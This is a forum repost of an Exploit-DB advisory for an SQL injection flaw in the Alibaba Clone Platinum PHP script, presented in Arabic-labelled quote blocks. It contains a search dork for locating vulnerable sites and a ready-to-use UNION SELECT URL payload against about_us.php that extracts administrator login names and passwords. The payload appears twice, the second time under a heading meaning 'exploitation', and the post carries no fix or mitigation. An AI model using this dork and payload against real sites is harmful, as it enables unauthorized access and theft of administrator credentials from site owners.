Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability

Dr.NaNo · 05-16-2010, 02:27 AM

اقتباس


	# title: Alibaba Clone Platinum (about_us.php) sql Injection vulnerability # edb-id: 12612 # cve-id: () # osvdb-id: () # author: Cobra_21 # published: 2010-05-15 # verified: Yes # download exploit code # download n/a view source print? ------------------------------------------------------------------------------------------- alibaba Clone Platinum (about_us.php) sql Injection vulnerability ------------------------------------------------------------------------------------------- author: Cobra_21 mail: uyku_cu@windowslive.com script home: http://www.alibabaclone.com/ price: $699 usd dork: Inurl:buyer/about_us.php?buyerid ------------------------------------------------------------------------------------------- sql injection: http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin -------------------------------------------------------------------------------------------

الإستغلال .:

اقتباس


	http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin